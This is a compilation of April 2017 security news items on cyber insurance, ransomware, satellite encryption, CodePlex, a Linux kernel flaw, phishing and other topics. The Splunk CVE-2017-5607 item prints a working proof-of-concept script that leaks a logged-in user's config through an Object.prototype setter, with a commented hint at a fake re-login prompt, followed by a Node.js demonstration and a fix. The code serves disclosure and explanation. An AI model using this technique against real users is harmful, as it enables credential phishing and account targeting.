The security researcher discovered the bug in November 2016 and reported it to Splunk the same month. He received acknowledgement of the bug a couple of days later, but the patch was released only last week. The researcher published not only details pertaining to the vulnerability, but also proof-of-concept JavaScript code and a video to demonstrate the flaw.

The second vulnerability addressed in Splunk Enterprise last week was a persistent cross-site scripting flaw in Splunk Web, which was found to allow an attacker to inject and store arbitrary script, but only if they are authenticated in Splunk Web before exploiting the bug. Assessed with a CVSS Base Score of 6.6, the flaw impacts Splunk Enterprise versions 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13; and Splunk Light before 6.5.2.


Cyber Risk and Cyber Insurance – Insurance challenge to the CIO as corporate Cyber Security Effectiveness manager
3.4.2017 securityaffairs CyberCrime

[By Cesare Burei, Margas on courtesy of @CLUSIT – Rapporto Clusit 2017 – All right reserved]
Until corporate Risk Managers who deal with Cyber Risk (and there are not many of them) start working at all levels, who should be entrusted with the management of Cyber Risks and, more specifically, with the transfer of risk to the insurance companies? The answer is a joint round table driven by the CIO.

The Clusit Report 2016 provided the basics of the terminology, key features and usefulness of cyber policies in a Focus On dedicated to insurance in support of the so-called Cyber Risk management. The authors implicitly addressed the CFO, the position that usually supervises the insurance issues in a company.

One year after, the daily dealings between businesses, insurance brokers and ICT consultants have highlighted the following elements:

Cyber Risk includes the accident/attack and all its direct and indirect consequences.
Awareness has increased of the pervasive nature of Cyber Risk well beyond the walls of EDP, in a digital ecosystem made of interconnections and of the interdependence of processes, people and now objects (IoT).
Risk Management, meaning risk analysis and mitigation and insurance transfer, has become increasingly important.
Business interruption, loss of reputation and data loss/unavailability are the most frequent issues for businesses.
This gave rise to a double investigation in the North-East of Italy, which ended in the “Enterprise Cyber Risk Exposure & Insurance” 1 report by Via Virtuosa, in collaboration with Margas for the insurance part, published on line at the end of 2016, hereinafter, the “White Paper”.

The first survey outlines, through the answers given by CIOs and Systems Administrators, the risk exposure of companies, so that CFOs and CEOs can become aware of the central role of the Cyber Security activity, managed in-house or outsourced. The second survey, also carried out with the help of the CIO, who has to assess the risk or the protection levels in place, tries to assess the level of knowledge and sensitivity of the insurance transfer.

The results highlight some aspects that show the key role of the CIO in the transition phase from the management of ICT security to cyber risk management for the whole company; the transfer of the so-called “residual risk” to the insurance company is an ultimate, fundamental component of such management. For this reason, the white paper includes some basic information on the Italian insurance market and, above all, thanks to the 18 questions that three CIOs accepted to ask, it also includes 18 useful answers that allow people to find their direction in the purchase of an insurance policy with increased awareness.

1 *The “Cyber Risk Exposure & Cyber Risk Insurance” white paper is the result of the joint efforts of Luca Moroni and Cesare Burei. It also includes the contributions by CIOs E. Guarnaccia – BPV | M. Cozzi – Hypo Bank |A. Cobelli – ATV| and the answers to their 18 questions on cyber-insurance. The risk exposure survey was carried out in the 2013-2016 three-year period, while the one on Cyber Risk Insurance in summer 2016. The white paper can be downloaded free of charge from: www.viavirtuosa.com/whitepaper and supports the “Generation Z” survey on online security and the prevention of risk for minors https://www.facebook.com/ProgettoGenerazioneZ/

Cyber Risk Insurance. Why?
The certainty that it is not possible to defend oneself completely from Cyber Risks requires such risks to be managed and the relevant tools to be correctly assessed in terms of costs and benefits. In short, it is a matter of balance between the impact of a cyber or cyber-related adverse event, the money spent in the management /insurance process and the maintenance of business margins.

Source: L. Moroni – “Cyber Exposure & Cyber Risk Insurance” White paper presentation at Infosek 2016 – Slovenia

On the occasion of the Security Summit and thanks to the Clusit Report, a lot of figures and percentages were made known, the better to describe the overall cyber un-safety, as they all underscore that there is no 100% safe system.

Source: CHUBB Claim Trends 8/2016

It is possible to be proactive, with effective and appropriate investments in the reduction of corporate risks, in order to be prepared to deal with accidents and the costs/damages that they engender. Insurance policies turn an uncertain, often unsustainable cost/damage into a programmed and sustainable cost/premium. The choice, therefore, must be based on a careful assessment in the prevention phase, so that the policies truly act as a financial and economic parachute, allowing the company to avoid closure and remain competitive after the incident, providing the appropriate tools to compensate balance sheet losses and recover the brand reputation.

Source: CHUBB Claim Trends 8/2016

Cyber Risk Exposure and Cyber Risk Insurance
Cyber Risk Insurance, that is, a policy or set of policies that “cover” the damages and costs generated by a cyber or cyber-related adverse event, makes no sense if there is no awareness of one’s risk exposure and thus no attempt to adopt measures to mitigate such exposure.

The risk exposure survey results

The risk exposure survey carried out by Via Virtuosa in the course of 3 years, synthesised in the White paper, “rather than highlighting an individual company’s positioning and risk exposure, focuses on the statistical trends of the interviewed sample, in this case, companies in the North-Eastern part of Italy, as against a reference Base Line (Red Line). The measuring method used in this case is strictly objective (as was the case for the 2700x) and the same for the whole sample group, even though it was considerably simplified. The method in question is the one adopted by the European Union Agency for Network and Information Security (ENISA).

Those who fall in the yellow section at the top right have a significant risk exposure, with a potentially disruptive impact on their business. Those who find themselves in this section are invited (as per the Method) to “outsource their risk.”

This research highlighted the following aspects:

There is a high level of corporate Cyber risk that has a direct impact on business continuity.
The IT department is usually aware of the issue, but is faced with an almost total lack of managerial attention from the corporate board, which translates into a dearth of investment.
There is no objective measure of the Cyber risk on the part of enterprises.
Objective indications of the need to transfer the Cyber risk outside the company emerge.
The results of the CIOs and Cyber Risk Insurance survey
The sample of this second survey contained a prevalence of subjects from the industry and services sectors (40% and 35%, respectively), with turnovers exceeding 20 million Euro (75%) and with over 100 employees (50% between 100-500 and 30% > 500).

This presupposes that aspects such as Reputation, Business Interruption and Sensitive Data management might be critical.

In the survey, IT Managers were asked, first of all, about the best case scenario in terms of board commitment to the creation of a corporate security team, and whether ICT security is considered an integral part of the general security approach or just as a possible source of costs and damages (questions 1,4).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Then, the same subjects were asked to do something that was probably unusual for them: interact with their respective CFOs, in order to answer the question on the presence of some insurance policies that ought to be taken into consideration with regard to the criticalities highlighted by the risk exposure analysis. (question 3)

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

60% of the interviewed CIOs were involved in a wider approach to security. Again, in 60% of cases the CIO had not, to that point, taken an interest in insurance policies (q.2), and even though in 80% of cases no one in the company thought to ask him about the impact of a possible accident (q. 4), he had a clear idea of its origins (q. 4) and was able to identify the sector that might suffer the most from a business interruption (question 8).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

The CIO deals with ICT security: he monitors vulnerabilities (60% of cases) and the Business Continuity and Disaster Recovery plans (50-60% of cases), but deals very rarely with reputation crisis issues (18%), procedure/policy formalisation (28%) or the standardisation of issues (12%).

It is a positive sign that the CIO receives requests for information concerning ICT security management (question 7) first of all from inside the company (+70%), then from external auditors (+28%) and from customers and ICT suppliers in equal measure (23-24%). The latter percentages might increase in future, leading to a supply chain control in terms of virtuous management and also of insurance, and in any case they may constitute a good foundation for a Cyber Risk Management policy.

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

39% of them state that they know of security accidents that occurred in the last 5 years. An analysis of the causes shows that such accidents are substantially attributable, in equal proportions, to (external/internal) attacks, with a prevalence of Ransomware (as more than 50% declared), to (internal/external) human error and to failures (question 9).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

What question 8 revealed concerning the CIO’s opinion of the worst impact of a stop of the ICT activities on the Administration/Accounting (+ 80%), logistics and deliveries (73%) and sales (60%) departments, makes it possible for the authors to go back to the value and meaning of insurance outsourcing: failure to pay the suppliers, failure to make orders or failed deliveries can assuredly cause problems for the bottom line in the short-, medium- or long-term.

“Virtuous” companies, that is to say, those that have adopted Cyber Risk Management policies, can therefore deal with the insurance companies with a full awareness of the residual risk that needs to be transferred, especially with regard to business interruption, intentional/accidental cyber issues and issues of general or professional third-party liability, and correctly assess also the reputation risk, if necessary.

With the CIO at the Cyber Risk Management round table
The results of the survey show that the CIO can act as a “cultural mediator” for the company, with the help of a competent insurance broker.

Below is a brief synthesis of the activities of a hypothetical operational round table on the management of cyber risk:

Cyber Risk Exposure and proactive approach: knowing the extent and nature of the exposure

Identify and quantify the assets and their value
Identify the exposure and its value, that is to say, the operating and financial consequences of an adverse event
Identify and quantify the investment in mitigation activities
Check the insurance coverage of the company and of its suppliers
Now the necessary tools and knowledge to deal with the insurance issues are in place, so it is time to TRANSFER THE RESIDUAL RISK.

Cyber Risk Insurance: transfer the residual risk to an Insurance Company

Identify a skilled insurance partner and analyse the corporate insurance stand.
Check the traditional policies purchased by the company to which the cyber coverage might be added.
Choose and structure a Cyber insurance policy that specifically deals with the risk to be transferred and the relevant costs (business interruption, general and professional third-party liability, violation or improper use of assets, defence of reputation, reaction and analysis countermeasures, etc.)
For further details, please refer to the Focus On feature in the 2016 Clusit Report.

The results of the “dialogue” between the CIO and the Insurance Broker – Answers concerning Cyber Risk Insurance
We asked the CIOs of three important companies in the North-East of Italy to ask any questions they could think of in order to make the layman understand the opportunities and limitations of the insurance policy. Here is a synthesis of the answers to the most frequently asked questions (18):

It is necessary to analyse the existing policies and check whether they cover also the ICT issues identified during the analysis;

To date, there is no requirement for a shared standard measure of exposure. Any best practices, certifications for risk mitigation can promote the successful transfer of risk to the insurance company at better coverage conditions;

GDPR and insurance: it will be essential to know whether the company is in possession of Sensitive Data according to the expanded definition of the new Regulation, in which country and which measures it adopts to defend against data breach. If the company’s own or Third-Party Sensitive Data are entrusted to a third party, it shall be necessary to analyse the existing contracts with the relevant supplier and check the contractual indemnities, in order to transfer the cost of the GDPR mandatory actions correctly. If the company writes or customises code, the extent of the corporate (professional, general, product) liability is to be assessed quite thoroughly;

Simulate the impact of a Cyber adverse event on the bottom line, in terms of cost increases and loss of gross profit. This is maybe the most critical and underestimated field, one that is known to insurers as Business Interruption.

To conclude, it is clear that the Cyber Risk Management approach must be based on a close cooperation between the corporate risk owners and the CIO and CFO and on a virtuous supply chain that includes customers and suppliers, the help of IT professionals expert in Cyber Security management and implementation and brokers expert on cyber matters who can support the Company in the choice of the right balance between costs and insurance guarantees.

Contents on http://www.clusit.it/rapportoclusit

Get the full report contacting rapporti@clusit.it

Copyright 2017 @ CLUSIT

All rights reserved to the authors of the work and Clusit

Any reproduction even partial publishing without the written permission of CLUSIT is forbidden.


Social Media Passwords Provide Easy Route into Corporate Networks

3.4.2017 securityweek Social
A combination of 'security fatigue' among users and inadequate password controls among the social media giants is providing a large attack vector for cybercriminals. This is the conclusion of a newly published survey that queried more than 250 security professionals at the RSA Conference in San Francisco in February 2017.

The survey (PDF), conducted by Thycotic, found that password hygiene is severely lacking even among security professionals. It found, for example, that 50% of security professionals have not changed their social network passwords for a year or more, and 20% have never changed them. When this is coupled with social networks not enforcing their own security options, the result is a weak underbelly for criminals to get into corporate networks.

"As we know," said Joseph Carson, Chief Security Scientist at Thycotic, "social networks give away a lot of private information. For people to not consider changing their passwords on a regular basis on their Facebook, Twitter and LinkedIn accounts, they are easily allowing hackers to access information that will grant them access to other facets of their lives, like their work computers and email. Not only is this a huge vulnerability, but this is also a flaw within large social networks that don't remind or make it clear and transparent to the user about the age or strength of the password or best practices."

It is a combination of factors that creates the problem. Users still use weak passwords and reuse them across multiple accounts. Thirty percent of the security professional respondents have used or are still using birthdays, addresses, pet names or children's names for their work passwords -- and all of these are easily crackable.

The problem is made worse by the increasing use of social media logons, where separate internet services allow users to log on with their Facebook, LinkedIn or Twitter password. "Social Logins creates a major security risk because it becomes the master key for all other accounts," Carson told SecurityWeek. "The problem stems further because it is not a proper vault and is used for more than just social logins -- such as for communication, email, browsing and online shopping -- so it is easily targeted and exploited."

One concerning implication from this survey is that user awareness training cannot solve the problem. The poor password practices of the respondents, said Carson, "is an indication that even security professionals continue to use weak passwords for social accounts and that cyber awareness training and cyber hygiene still has a lot of room for improvement. Much of this is a result of cyber fatigue and lack of built-in automation for social accounts."

According to Verizon's 2016 Data Breach Investigations Report, 63% of confirmed data breaches involved weak, default or stolen passwords. "The use of stolen, weak or default credentials in breaches is not new, is not bleeding edge, is not glamorous, but boy howdy it works," the DBIR says.

Forrester Research puts the breach figure even higher, estimating in its 'Forrester Wave: Privileged Identity Management, Q3 2016' report that up to 80% of breaches involve the abuse of privileged accounts. Thycotic's own research indicates that use of passwords as the primary authentication control is still growing, estimating that the 90 billion passwords currently in use will grow to 300 billion by 2020.

Carson does not believe that the solution can simply be awareness training and improved password practices. "There is no such thing as an uncrackable password," Carson told SecurityWeek; "but you can make it very difficult with the computing power plus time to crack the password -- which can deter the attacker from even trying to crack the password. In most cases, it is easier for the attacker to ask the user to tell them the password via phishing scams."

But the big takeaway from Thycotic's survey is that users -- even those users who should know better -- simply are not making it hard for the criminals. Coupled with the disinclination of social media giants to enforce strong access requirements, social media is providing an easy route into employees' accounts; and from there into corporate privileged accounts. Users, suggests Thycotic, cannot be relied upon to protect their passwords, making technology-based privileged account management an absolute necessity.


Android Ransomware Employs Advanced Evasion Techniques

3.4.2017 securityweek Virus

A newly discovered Android ransomware family employs heavy obfuscation and delayed activation of malicious functionality to ensure it can evade anti-virus solutions, Zscaler security researchers warn.

The malware was found hidden inside the repackaged Russian entertainment social network app OK, which the malware author disassembled to insert malicious code, researchers say. The good news, however, is that the legitimate variant of OK, which has over 50 million downloads in Google Play, hasn’t been compromised.

The first evasion technique leveraged by the mobile threat involves kicking off the malicious activity four hours after the initial installation. Most detection mechanisms expect malware to immediately start operation, meaning that this ransomware won’t be immediately detected.

After the four hours have passed, however, users are prompted to activate device administrator rights for the application. Users can’t dismiss the activation screen and clicking the “Cancel” button won’t help either, because the screen is immediately re-displayed until admin rights are enabled, the security researchers reveal.

As soon as this happens, the malicious app locks the device’s screen and displays a ransom note, informing users that their data has been encrypted and sent to the attacker’s servers. Users are urged to pay a 500 Rubles ransom to restore data and unlock the device. The attackers also attempt to scare users into paying by claiming that they would send a message to all of the victim’s contacts to inform them that the device has been “blocked for viewing child pornography.”

According to Zscaler, however, the malware does not exfiltrate any of the victims’ data, and it has no means of unlocking the compromised device. Although the ransomware does inform the command and control (C&C) server of the new victim, it has no mechanism to confirm that the ransom was paid, meaning that the device remains locked regardless of whether the victim pays.

In addition to the delayed start of malicious activities, the ransomware’s malicious code is highly obfuscated. “Almost all strings, method names, variable names, and class names are disguised in such a way that it's extremely difficult to understand the code. Most of these methods are invoked using Java reflection technique, which allows the author to evade static analysis detection,” Zscaler says.

To stay protected from this threat, users are advised to avoid installing applications from third-party app stores. Those who were already infected should reboot the device in Safe Mode, remove the application’s admin rights, then uninstall it and reboot the device in normal mode.

Given the stealth tactics used in this ransomware, Zscaler says that the malware author could likely succeed in uploading it to the Google Play application storefront, although they have not done so far.


Japan plans to develop a hack-proof satellite system
3.4.2017 securityaffairs BigBrothers

Japan plans to develop a hack-proof satellite system that protects transmissions between satellites and ground stations with dynamically generated encryption keys.
Japan’s Internal Affairs and Communications Ministry plans to develop a communications system to protect satellites from cyber attacks.

The hack-proof satellite system will protect transmissions between satellites and ground stations by encrypting the data with keys that are generated on board and change dynamically.

“With the proposed plan, the government aims to establish a secure communications network that is unique to Japan, for domestic security purposes and to spur investment in the private-sector aerospace industry.” reported the Watertown Daily Times.

The ambitious project is led by the National Institute of Information and Communications Technology, which falls under the ministry, and will involve government, industry and academic institutions. The goal is to offer the system for commercial use in five to ten years; the ministry aims to gain an edge in the industry by developing a secure communications system that private-sector companies and organizations can use at low cost.

A final decision on the hack-proof satellite system is expected this summer, and funds for the project will be included in the budget plan for fiscal 2018.

Cyber attacks are a serious threat to satellite communications. Satellites play a crucial role in our digital society and almost every industry depends on their services, which is why their security is a pillar of the cyber-security strategies of governments worldwide.

Attackers pose a growing challenge to satellite operators, and commercial satellites, which lack military-grade security, are the most exposed. Security researchers warn about the possible effects of a successful attack against satellite systems and urge that they be built with a security-by-design approach.

Satellites communicate with terrestrial ground stations over radio links, which an attacker within range can intercept, with unpredictable consequences.

An attacker who can decode the encrypted data can steal information, manipulate it, or take control of the satellite.

Governments consider a cyber attack by a nation-state actor, a criminal organization or even a lone hacker to be a realistic threat. The principal concerns relate to operations by Chinese hackers, likely state-sponsored, who have already breached the security of US satellites in the past.


In August, the Chinese government launched the world’s first quantum satellite, which will help it establish “hack-proof” communications between space and the ground.

Alleged state-sponsored hackers interfered with the operations of two U.S. government satellites in 2007 and 2008 obtaining access through a ground station in Norway. The satellites were used for climate monitoring.

The hackers “achieved all steps required to command” the Terra AM-1 satellite but did not actually take control of it. An attacker with command privileges could “deny or degrade as well as forge or otherwise manipulate the satellite’s transmission,” or simply damage or destroy the satellite.

The Japanese government’s plan is to install a code generator on the satellites so that they can dynamically encrypt data.

“The dynamic codes will be sent to the ground base station using light beams. As the encryption is dynamic, it is more difficult for hackers to decode data even if they are able to intercept transmissions.” continues the Watertown Daily Times.

The code generator is a small cube (approximately 10 centimeters on each side) that could easily be installed on a micro satellite of approximately 30 to 40 centimeters on each side, which is being developed by a start-up firm.


The world is not ready for new cyber threats, warns security expert

3.4.2017 Novinky/Bezpečnost Kyber
The way wars are waged has changed, and the countries of the world do not yet know how to cope with the new methods of attack conducted over the internet. The most dangerous attacks are not carried out by individuals but directly by states, often in cooperation with criminal organizations. So said Israeli cyber-security expert Lior Tabansky, who took part in a conference on international security in Prague last week.
"New ways of waging war have emerged," said the specialist, who works at the cyber-security bureau that reports to the Israeli government. Hacking attacks such as the recently revealed compromise of the Czech Foreign Ministry's e-mail are, in his view, not the main risk. "That is traditional espionage, it is common, and there are ways to limit the risks. I am far more worried about the destructive attacks that cyber technologies make possible," he said.

According to Tabansky, it is already possible to attack and physically cripple a state's basic industrial infrastructure over the internet.

"We know how to defend against conventional weapons; we have the means to deter attackers. But we are not yet prepared for cyber attacks. This form of attack bypasses our defenses, which is an unhealthy situation and means that we are facing a very serious threat," Tabansky said.

Attacks backed by states
The most serious risk, according to Tabansky, is attacks organized by individual states. "But they often cooperate with organized crime for mutual benefit, so it is harder than in the past to distinguish between them," he noted.

He did not say directly which region the threats most often come from, but he hinted at who probably has no interest in waging a cyber conflict. "Experience shows us that the countries that are currently strong and control the world order are not the ones developing tools to break it up. It is rather the countries that are unhappy with the current arrangement that have an interest in doing so," he said.

According to Tabansky, countries must focus on developing new defensive concepts capable of responding to cyber threats. He pointed out, however, that this creates a dilemma between the right to protection and the right to privacy. "If we want to protect cyber systems, we have to monitor them, to know what is happening inside them. And that of course creates a conflict with basic human freedoms," he said.

International cooperation in defending against cyber threats is limited, according to Tabansky, even when countries are members of defense alliances. "There are certain limits to what one side wants to share with the other. Even if you are a member of an international alliance, most of the responsibility for national security remains with national authorities," he said.


Microsoft is Shutting Down CodePlex, Asks Devs To Move To GitHub
3.4.2017 thehackernews IT
Microsoft has announced to shut down CodePlex -- its website for hosting repositories of open-source software projects -- on December 15, 2017.
Launched in 2006, CodePlex was one of Microsoft's biggest steps towards the open source community -- a place where any programmer, anywhere, could share the code for their software or download and tweak the code to their liking.
However, Microsoft says that usage of the service has fallen dramatically, with fewer than 350 projects seeing a source code commit over the last 30 days, and points to GitHub as the "de-facto place for open source sharing."
GitHub – 'Facebook for Programmers'
In a blog post published Friday, Microsoft Corporate VP Brian Harry wrote that the shutdown of CodePlex is because the open source community has almost entirely moved over to GitHub, which provides similar functionality for sharing code that people can collaborate on.
"Over the years, we have seen a lot of amazing options come and go but at this point, GitHub is the de-facto place for open source sharing, and most open source projects have migrated there," says Harry.
According to the company, Github has become the "Facebook for programmers," so "it's time to say goodbye to CodePlex."
For now, Microsoft has disabled the ability to create new projects on CodePlex, and in October the site will be turned into a read-only archive.
The complete shutdown comes on December 15 this year, at which point the CodePlex website will be archived indefinitely.
"You will also be able to download an archive file with your project contents, all in common, transferable formats like Markdown and JSON," Harry writes.
"Where possible, we will put in place redirects so that existing URLs work, or at least redirect you to the project's new homepage on the archive. And, the archive will respect your "I've moved" setting, if you used it, to direct users to the current home of your project."
Migrate your Code and Related Projects to GitHub
Harry also points out that many of Microsoft's own open source projects have already found their way to GitHub, and the company is actively recommending that other developers do the same.
The company is itself using GitHub to host open-source software projects such as PowerShell, .NET and its Chakra JavaScript engine.
Microsoft is making the process of migration easier for its users. Microsoft has teamed up with GitHub to create a "streamlined" migration tool to help developers shift their code and related content over to GitHub.
Since a release date of the migration tool is not yet known, users can check out the guide on CodePlex for any help with migrating to GitHub.


No Prizes Awarded in Google's Android Hacking Contest

3.4.2017 thehackernews Android

Google reported last week that its Project Zero Prize contest was not as successful as the company hoped it would be – no valid Android exploits were submitted and no prizes were awarded.

In September, Google announced the start of a six-month Android hacking contest that invited researchers to submit serious vulnerabilities and exploit chains. The first winning entry was offered $200,000, and the second would have received $100,000. Other entries were promised at least $50,000.

While some research teams and individuals informed the company of their intention to take part in the contest, ultimately, no one submitted any valid bugs, said Google Project Zero’s Natalie Silvanovich. Some vulnerability reports were submitted, but they were not eligible for a reward under the rules of the Project Zero Prize.

Google believes three main factors led to the lack of entries. One of them was the level of difficulty – hackers were required to find a full exploit chain that allowed remote code execution on up-to-date Nexus 6P and Nexus 5X devices by knowing only their email address and phone number. The targeted user could only open an email in Gmail or an SMS in Messenger.

Project Zero Prize participants were encouraged to submit partial exploits during the contest, since the rules allowed only the first submitter of a given vulnerability to use it in the contest.

“We expected these rules to encourage participants to file any bugs they found immediately, as only the first finder could use a specific bug, and multiple reports of the same Android bug are fairly common,” Silvanovich explained. “Instead, some participants chose to save their bugs for other contests that had lower prize amounts but allowed user interaction, and accept the risk that someone else might report them in the meantime.”

The tech giant also believes the prizes offered in the contest may have been too small for the types of vulnerabilities that were required. For example, zero-day acquisition firm Zerodium also offers up to $200,000 for Android rooting exploits and they can fetch much more on the black market.

While this contest was not a success, researchers do find plenty of vulnerabilities in Android. Google revealed recently that it paid out roughly $1 million for Android flaws reported last year through its vulnerability reward program.


Attackers can siphon data from Splunk Enterprise if an authenticated user visits a malicious webpage
3.4.2017 thehackernews Vulnerebility

Splunk has fixed a security issue in the JavaScript served by Splunk Enterprise, tracked as CVE-2017-5607, that can be exploited to siphon information about the logged-in user.
Splunk Enterprise is the company's platform for collecting, searching, monitoring, analyzing and visualizing high volumes of machine-generated data.


The issue can be exploited by tricking an authenticated Splunk user into visiting a malicious web page. The page learns the victim's Splunk username and whether the remote user setting is enabled, information an attacker can use to spear-phish the user for credentials or to brute-force the Splunk login with a known-valid username.

“Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage. Some useful data gained is the currently logged in username and if remote user setting is enabled.” reads the advisory published at Full Disclosure. “After, the username can be used to Phish or Brute Force Splunk Enterprise login. Additional information stolen may aid in furthering attacks.

Root cause is the global Window JS variable assignment of config?autoload=1 '$C'.”

The problem stems from how the data is delivered. The config?autoload=1 endpoint returns JavaScript that assigns the current user's settings to a global variable named $C. In the browser every object, including the window object, inherits from Object.prototype. A malicious page can therefore define a setter for the property $C on Object.prototype and then include the Splunk endpoint with a <script> tag: the victim's browser sends the request with the victim's Splunk session, the returned script executes in the attacker's page, and its assignment to $C invokes the attacker's setter with the configuration object as the argument. This is a cross-site script inclusion (XSSI) leak; the attacker never reads the response directly, only what the script does when it runs.

“To steal information we simply can define a function to be called when the '$C' JS property is "set" on webpage, for example. Object.defineProperty( Object.prototype, "$C", { set:function(val){…” continues the advisory.

Below is the proof-of-concept JavaScript code published in the advisory:

<script>
Object.defineProperty(Object.prototype, "$C", {
  set: function (val) {
    // Optional: re-use the leaked username in a fake re-login prompt
    // prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: " + val.USERNAME, "Password");
    for (var i in val) {
      alert("" + i + " " + val[i]);
    }
  }
});
</script>
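To make the mechanism concrete, the following Node.js example (added here; it is not code from the advisory or from Splunk) reproduces the leak against a stand-in window object and contrasts it with a version of the config script that defines $C with Object.defineProperty instead of a plain assignment. The advisory names only USERNAME and the remote-user flag; the other fields in the sample config, and the exact shape of the real response, are assumptions.

```javascript
"use strict";

// Constructed stand-in for the body of Splunk's config?autoload=1 response.
// USERNAME and a remote-user flag are named in the advisory; the remaining
// field names and values are assumptions made for this example.
const SAMPLE_CONFIG = { USERNAME: "jdoe", REMOTE_USER: false, SPLUNKD_PORT: 8089 };

// Vulnerable pattern: the script stores the data with [[Set]]
// (`window.$C = {...}` or a bare `$C = {...}`). [[Set]] walks the
// prototype chain, so an accessor planted on Object.prototype receives the value.
function vulnerableConfigScript(win) {
  win.$C = { ...SAMPLE_CONFIG };
}

// Hardened pattern for the same script: Object.defineProperty performs
// [[DefineOwnProperty]], which creates an own data property on the global
// and never consults inherited setters. (Serving the data as JSON behind a
// CSRF token, instead of as executable script, removes the issue entirely.)
function hardenedConfigScript(win) {
  Object.defineProperty(win, "$C", {
    value: { ...SAMPLE_CONFIG },
    writable: false,
    configurable: false,
    enumerable: true,
  });
}

// Attacker page: plant a setter for "$C" on Object.prototype, then let the
// victim's config script run against a window-like object, as it would when
// pulled in by a cross-origin <script src=".../config?autoload=1"> tag.
function runAttackerPage(configScript) {
  const leaked = {};
  Object.defineProperty(Object.prototype, "$C", {
    configurable: true,
    set(val) {
      for (const key of Object.keys(val)) leaked[key] = val[key];
    },
  });
  const win = {}; // stands in for window; its prototype chain ends at Object.prototype
  try {
    configScript(win);
  } finally {
    delete Object.prototype.$C; // remove the trap so the rest of the process is unaffected
  }
  return {
    leaked,
    // Did the data land on the "window"? With the trap in place, the
    // vulnerable assignment never creates an own property: the attacker
    // gets the data and the legitimate page loses it.
    windowHasOwnC: Object.prototype.hasOwnProperty.call(win, "$C"),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", runAttackerPage(vulnerableConfigScript));
  console.log("hardened:  ", runAttackerPage(hardenedConfigScript));
}
```

Running the file prints the full config object as captured by the setter for the vulnerable script and an empty object for the hardened one. The same trap works for any sensitive endpoint that answers a credentialed cross-origin script request with a global assignment, which is why such data should be served as JSON rather than as JavaScript.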

Affected Splunk Enterprise versions are:

6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2


Linux Kernel vulnerability CVE-2017-7184 disclosed at Pwn2Own 2017 fixed
3.4.2017 securityaffairs Vulnerebility

The Linux kernel flaw exploited by the hackers at the Zero Day Initiative’s Pwn2Own 2017 competition to hack Ubuntu has been patched.
The Chaitin Security Research Lab (@ChaitinTech) discovered a Linux kernel flaw, tracked as CVE-2017-7184, during the Pwn2Own 2017 competition. The experts hacked Ubuntu Desktop by exploiting a heap out-of-bounds access in the Linux kernel and earned $15,000 and 3 Master of Pwn points. It was the first time Ubuntu Linux was hacked at Pwn2Own.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of the Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.” reads the ZDI advisory.

“The specific flaw exists within the handling of xfrm states. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to elevate privileges and execute arbitrary code under the context of the kernel.”

Linux Kernel Flaw CVE-2017-7184 Pwn2Own 2017

The vulnerability can be exploited to cause a denial-of-service (DoS) condition or to execute arbitrary code. It could be exploited by a local attacker to escalate privileges on the system.

Red Hat rated the flaw as “high severity,” although its experts confirmed that it cannot be exploited for privilege escalation on default or common configurations of Red Hat Enterprise Linux 5, 6 and 7.

The CVE-2017-7184 flaw was fixed in the Linux kernel a few days after the Pwn2Own 2017 competition, and the Ubuntu team shipped patched kernels at the end of March. Other Linux distributions are working on their own security updates.


Phishing campaigns target airline consumers seeking business credentials
3.4.2017 securityaffairs Phishing

A series of phishing campaigns is targeting airline consumers with messages crafted to trick victims into handing over personal or business credentials.
The wave of phishing campaigns targets airline consumers with messages designed to lure victims into handing over personal or business credentials.

The phishing messages pretend to come from a travel agency or from someone inside the target firm, and they either include a weaponized document or embed a malicious link.

“Over the past several weeks, we have seen a combination of attack techniques. One, where an attacker impersonates a travel agency or someone inside a company. Recipients are told an email contains an airline ticket or e-ticket,” explained Asaf Cidon, vice president, content security services at Barracuda Networks.


According to Barracuda Networks, the aviation-themed phishing messages link to spoofed airline sites, and the threat actors personalize the phishing page to trick victims into providing business information.

The attackers show a deep knowledge of their targets, concentrating on the logistics, manufacturing and shipping industries.

“It’s clear there is some degree of advanced reconnaissance that takes place before targeting individuals within these companies,” Cidon added.

Recently the U.S. Computer Emergency Readiness Team issued an alert of phishing campaigns targeting airline consumers.

“US-CERT has received reports of email-based phishing campaigns targeting airline consumers. Systems infected through phishing campaigns act as an entry point for attackers to gain access to sensitive business or personal information.” reads the US-CERT warning.

“US-CERT encourages users and administrators to review an airline Security Advisory and US-CERT’s Security Tip ST04-014 for more information on phishing attacks.”

The US-CERT specifically references the security advisory published by Delta Air Lines that warned its consumers of fraudulent activities.

“Delta has received reports of attempts by parties not affiliated with us to fraudulently gather customer information in a number of ways including: fraudulent emails, social media sites, postcards, Gift Card promotional websites claiming to be from Delta Air Lines and letters or prize notifications promising free travel,” states the Delta Air Lines warning.

Barracuda confirmed that these campaigns have a high success rate:

“Our analysis shows that for the airline phishing attack, attackers are successful over 90 percent of the time in getting employees to open airline impersonation emails,” concluded Cidon. “This is one of the highest success rates for phishing attacks.”


Forcepoint spotted the modular Felismus RAT, it appears the work of skilled professionals
2.4.2017 securityaffairs Virus

Malware researchers at Forcepoint have discovered a new modular malicious code, dubbed Felismus RAT, that appears to be the work of skilled professionals.
The malware has been used in highly targeted campaigns, and the experts believe the Felismus RAT is the work of skilled professionals.

The malware implements sophisticated evasion and anti-analysis features, including advanced encryption of its network communications (it uses at least three separate encryption methods depending on the type of message). Forcepoint also noted the good ‘operational hygiene’ of the threat actor, which avoided re-using email addresses and other traceable artifacts across its campaigns.

